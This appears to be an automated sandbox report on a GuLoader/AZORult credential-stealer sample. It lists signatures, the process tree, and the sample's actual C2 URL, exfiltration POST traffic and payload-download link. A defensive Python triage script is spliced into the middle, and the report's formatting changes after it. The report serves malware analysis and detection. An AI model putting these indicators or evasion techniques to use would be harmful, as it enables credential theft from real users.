
Analysis Report Shipping document.exe

Overview

General Information

Sample Name: Shipping document.exe
Analysis ID: 318114
MD5: a762367c8bb3a6767623554812ef4f45
SHA1: a9640f69a56a674cfd2f889d0c1f978bba632675
SHA256: 036f01c20524f75f7ab8a3f30fdb336ef4eb050a4071b9e022bb7389114457b1
Tags: AZORult, exe

Most interesting Screenshot:

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Executable has a suspicious name (potential lure to open the executable)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • Shipping document.exe (PID: 7044 cmdline: 'C:\Users\user\Desktop\Shipping document.exe' MD5: A762367C8BB3A6767623554812EF4F45)
    • Shipping document.exe (PID: 7132 cmdline: 'C:\Users\user\Desktop\Shipping document.exe' MD5: A762367C8BB3A6767623554812EF4F45)
      • cmd.exe (PID: 6604 cmdline: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Shipping document.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6428 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.421788757.000000001E050000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000001.00000002.418079486.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
Process Memory Space: Shipping document.exe PID: 7044 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |

            Sigma Overview

            No Sigma rule has matched

            Signature Overview


            AV Detection:

            Multi AV Scanner detection for domain / URL
            Source: laninesolution.com; Virustotal: Detection: 10%
            Source: http://laninesolution.com/roky/PL341//index.php; Virustotal: Detection: 10%
            Multi AV Scanner detection for submitted file
            Source: Shipping document.exe; Virustotal: Detection: 50%
            Source: Shipping document.exe; ReversingLabs: Detection: 47%
            Machine Learning detection for sample
            Source: Shipping document.exe; Joe Sandbox ML: detected

            Networking:

            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            Source: Traffic; Snort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.6:49729 -> 202.52.146.108:80
            Source: Traffic; Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 202.52.146.108:80 -> 192.168.2.6:49729
            Source: Joe Sandbox View; ASN Name: GMEDIA-AS-IDGlobalMediaTeknologiPTID GMEDIA-AS-IDGlobalMediaTeknologiPTID
            Source: global traffic; HTTP traffic detected: POST /roky/PL341//index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: laninesolution.com | Content-Length: 113 | Cache-Control: no-cache | Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 45 14 eb 26 66 98 26 66 98 42 70 9d 34 70 9d 31 70 9c 47 70 9d 37 70 9d 33 70 9d 33 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 6c | Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gE&f&fBp4p1pGp7p3p3p10l0b0l
            Source: global traffic; HTTP traffic detected: POST /roky/PL341//index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: laninesolution.com | Content-Length: 31089 | Cache-Control: no-cache
            Source: unknown; DNS traffic detected: queries for: onedrive.live.com
            Source: unknown; HTTP traffic detected: POST /roky/PL341//index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: laninesolution.com | Content-Length: 113 | Cache-Control: no-cache | Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 45 14 eb 26 66 98 26 66 98 42 70 9d 34 70 9d 31 70 9c 47 70 9d 37 70 9d 33 70 9d 33 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 6c | Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gE&f&fBp4p1pGp7p3p3p10l0b0l
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: Shipping document.exe, 00000001.00000002.421788757.000000001E050000.00000004.00000001.sdmp; String found in binary or memory: http://laninesolution.com/roky/PL341//index.php
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://ocsp.digicert.com0C
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://ocsp.digicert.com0N
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://ocsp.thawte.com0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: mozglue.dll.1.dr; String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: http://www.mozilla.com0
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmp; String found in binary or memory: http://www.msn.com/Fhttps://www.google.com/chrome/=
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmp; String found in binary or memory: http://www.msn.com/de-ch/
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp; String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp; String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmp; String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp; String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp; String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/checksync.php
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/checksync.php.r
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/medianet.phpZhttps://contextual.media.net/medianet.php
            Source: Shipping document.exe, 00000001.00000002.418079486.0000000000560000.00000040.00000001.sdmp; String found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21255&authkey=AOsP8wq
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr; String found in binary or memory: https://www.digicert.com/CPS0
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmp; String found in binary or memory: https://www.google.com/chrome/thank-you.html

            System Summary:

            Executable has a suspicious name (potential lure to open the executable)
            Source: Shipping document.exe; Static file information: Suspicious name
            Initial sample is a PE file and has a suspicious name
            Source: initial sample; Static PE information: Filename: Shipping document.exe
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02211775 NtSetInformationThread, 0_2_02211775
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216799 NtProtectVirtualMemory, 0_2_02216799
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02210480 EnumWindows, NtSetInformationThread, 0_2_02210480
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_022140ED NtWriteVirtualMemory, 0_2_022140ED
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216CCB NtResumeThread, 0_2_02216CCB
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_022110DE NtWriteVirtualMemory, TerminateProcess, 0_2_022110DE
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212A25 NtWriteVirtualMemory, 0_2_02212A25
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216E1C NtResumeThread, 0_2_02216E1C
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212A7D NtWriteVirtualMemory, 0_2_02212A7D
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216E45 NtResumeThread, 0_2_02216E45
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212E4D NtWriteVirtualMemory, 0_2_02212E4D
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02215A86 NtSetInformationThread, 0_2_02215A86
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212AE4 NtWriteVirtualMemory, 0_2_02212AE4
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02211AE9 NtWriteVirtualMemory, 0_2_02211AE9
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_022102EF NtWriteVirtualMemory, 0_2_022102EF
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216EF1 NtResumeThread, 0_2_02216EF1
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02215AF2 NtSetInformationThread, 0_2_02215AF2
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216EC1 NtResumeThread, 0_2_02216EC1
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216F79 NtResumeThread, 0_2_02216F79
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212B40 NtWriteVirtualMemory, 0_2_02212B40
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212BAA NtWriteVirtualMemory, 0_2_02212BAA
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216F9C NtResumeThread, 0_2_02216F9C
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212C20 NtWriteVirtualMemory, 0_2_02212C20
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02217035 NtResumeThread, 0_2_02217035
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216819 NtProtectVirtualMemory, 0_2_02216819
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212842 NtWriteVirtualMemory, 0_2_02212842
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_0221585E NtSetInformationThread, 0_2_0221585E
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_022170A2 NtResumeThread, 0_2_022170A2
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212CA4 NtWriteVirtualMemory, 0_2_02212CA4
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216CF9 NtResumeThread, 0_2_02216CF9
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212CFE NtWriteVirtualMemory, 0_2_02212CFE
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_022154CA NtSetInformationThread, 0_2_022154CA
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216CD1 NtResumeThread, 0_2_02216CD1
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216D24 NtResumeThread, 0_2_02216D24
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02210532 NtSetInformationThread, 0_2_02210532
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02210538 NtSetInformationThread, 0_2_02210538
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_0221293C NtWriteVirtualMemory, 0_2_0221293C
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02210509 NtSetInformationThread, 0_2_02210509
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_0221710E NtResumeThread, 0_2_0221710E
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02210560 NtSetInformationThread, TerminateProcess, 0_2_02210560
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02217168 NtResumeThread, 0_2_02217168
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02215D6C NtSetInformationThread, NtWriteVirtualMemory, 0_2_02215D6C
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216D78 NtResumeThread, 0_2_02216D78
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212D7E NtWriteVirtualMemory, 0_2_02212D7E
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216DA1 NtResumeThread, 0_2_02216DA1
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_022129BC NtWriteVirtualMemory, 0_2_022129BC
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_0221718B NtResumeThread, 0_2_0221718B
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_0221059E NtSetInformationThread, 0_2_0221059E
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02212DF8 NtWriteVirtualMemory, 0_2_02212DF8
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_02216DCD NtResumeThread, 0_2_02216DCD
            Source: C:\Users\user\Desktop\Shipping document.exe; Code function: 0_2_022105D6 NtSetInformationThread, 0_2_022105D6
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212D7E NtWriteVirtualMemory,0_2_02212D7E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216DA1 NtResumeThread,0_2_02216DA1
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022129BC NtWriteVirtualMemory,0_2_022129BC
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221718B NtResumeThread,0_2_0221718B
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221059E NtSetInformationThread,0_2_0221059E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212DF8 NtWriteVirtualMemory,0_2_02212DF8
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216DCD NtResumeThread,0_2_02216DCD
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022105D6 NtSetInformationThread,0_2_022105D6
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216E1C0_2_02216E1C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216E1C0_2_02216E1C
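The rows above are the raw evidence behind two of the report's signatures: NtSetInformationThread (the "hides threads from debuggers" finding) and the NtWriteVirtualMemory / NtProtectVirtualMemory / NtResumeThread combination that goes with "creates a process in suspended mode (likely to inject code)". The following is an added triage script, not part of the sandbox report and not Joe Sandbox code: it parses rows in this format (both the raw export, where the function id is repeated as link text at the end of the row, and the cleaned form), counts the native APIs per function, and reports the two patterns. The sample rows are copied from this report; function ids and the scoring rules are illustrative. Note that NtSetInformationThread alone does not prove the ThreadHideFromDebugger information class was used; the sandbox's dynamic signature is what confirms that here.

```python
"""Triage 'Code function' rows from a sandbox report (added example)."""
import re
from collections import Counter, defaultdict

# Function ids look like <pid>_<n>_<8 hex digits>, e.g. 0_2_02212E4D.
FID_RE = re.compile(r"\d+_\d+_[0-9A-Fa-f]{8}")

# API combinations the report's signatures rest on (illustrative rule set).
INJECTION_TRIAD = {"NtWriteVirtualMemory", "NtProtectVirtualMemory", "NtResumeThread"}
ANTI_DEBUG = {"NtSetInformationThread"}

# Sample rows (taken from the report); mixed raw and cleaned formats on purpose.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212E4D NtWriteVirtualMemory,0_2_02212E4D",
    r"Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210560 NtSetInformationThread,TerminateProcess,0_2_02210560",
    r"Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216E1C0_2_02216E1C",
    r"Source: C:\Users\user\Desktop\Shipping document.exe | Code function: 0_2_02215A86 NtSetInformationThread",
    r"Source: C:\Users\user\Desktop\Shipping document.exe | Code function: 0_2_02216EF1 NtResumeThread",
    r"Source: C:\Users\user\Desktop\Shipping document.exe | Code function: 0_2_02216819 NtProtectVirtualMemory",
    r"Source: C:\Users\user\Desktop\Shipping document.exe | Code function: 0_2_02215D6C NtSetInformationThread,NtWriteVirtualMemory",
    # A non-code row that the parser must skip.
    r"Source: Shipping document.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST",
]


def parse_row(row):
    """Return (function_id, [api, ...]) for a 'Code function' row, else None."""
    if "Code function:" not in row:
        return None
    body = row.split("Code function:", 1)[1].strip()
    m = FID_RE.match(body)
    if not m:
        return None
    fid = m.group(0)
    rest = body[m.end():]
    # The raw export repeats the function id as link text at the end; drop it.
    if rest.endswith(fid):
        rest = rest[: -len(fid)]
    apis = [a for a in rest.strip().split(",") if a]
    return fid, apis


def triage(rows):
    """Group APIs by function, count them, and evaluate the two report patterns."""
    per_func = defaultdict(list)
    counts = Counter()
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        fid, apis = parsed
        per_func[fid].extend(apis)
        counts.update(apis)

    findings = []
    hiders = [f for f, apis in per_func.items() if ANTI_DEBUG & set(apis)]
    if hiders:
        findings.append(
            "NtSetInformationThread in %d function(s) (%s): thread-hiding candidate, "
            "confirm the information class is ThreadHideFromDebugger" % (len(hiders), ", ".join(sorted(hiders)))
        )
    if INJECTION_TRIAD <= set(counts):
        findings.append(
            "write/protect/resume triad present: consistent with writing a payload into a "
            "suspended child and resuming it"
        )
    # Functions that pair the anti-debug call with TerminateProcess deserve a manual look.
    bail = [f for f, apis in per_func.items() if "NtSetInformationThread" in apis and "TerminateProcess" in apis]
    for f in bail:
        findings.append("%s combines NtSetInformationThread with TerminateProcess: possible check-and-exit path" % f)
    return {"api_counts": dict(counts), "functions": dict(per_func), "findings": findings}


if __name__ == "__main__":
    for line in triage(SAMPLE_ROWS)["findings"]:
        print(line)
```

The triad rule deliberately ignores which process handle the calls target; on a live system the same three APIs are also used by debuggers and some installers, so treat the output as a triage hint that still needs the process-tree context (the suspended self-spawn in this report) before it counts as injection.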
Source: Shipping document.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Shipping document.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: Shipping document.exe, 00000000.00000002.353511295.0000000000415000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameaarsdag.exe vs Shipping document.exe
Source: Shipping document.exe, 00000000.00000002.354194169.00000000021D0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000003.392702790.000000001EF78000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameapisetstubj% vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000003.396678045.000000001E508000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefreebl3.dll0 vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000000.352534561.0000000000415000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameaarsdag.exe vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.421657967.000000001DD90000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.421825591.000000001E2A0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.418017725.00000000000E0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.418017725.00000000000E0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Shipping document.exe
Source: Shipping document.exe, 00000001.00000002.421623943.000000001DC40000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Shipping document.exe
Source: Shipping document.exe | Binary or memory string: OriginalFilenameaarsdag.exe vs Shipping document.exe
Source: C:\Users\user\Desktop\Shipping document.exe | Section loaded: crtdll.dll
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@8/49@3/2
Source: C:\Users\user\Desktop\Shipping document.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7A741079-FAE66A72-4002A979
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
Source: C:\Users\user\Desktop\Shipping document.exe | File created: C:\Users\user\AppData\Local\Temp\~DF3F1467CD0ED6D91D.TMP
Source: Shipping document.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Shipping document.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\Shipping document.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Shipping document.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Shipping document.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Shipping document.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Shipping document.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Shipping document.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
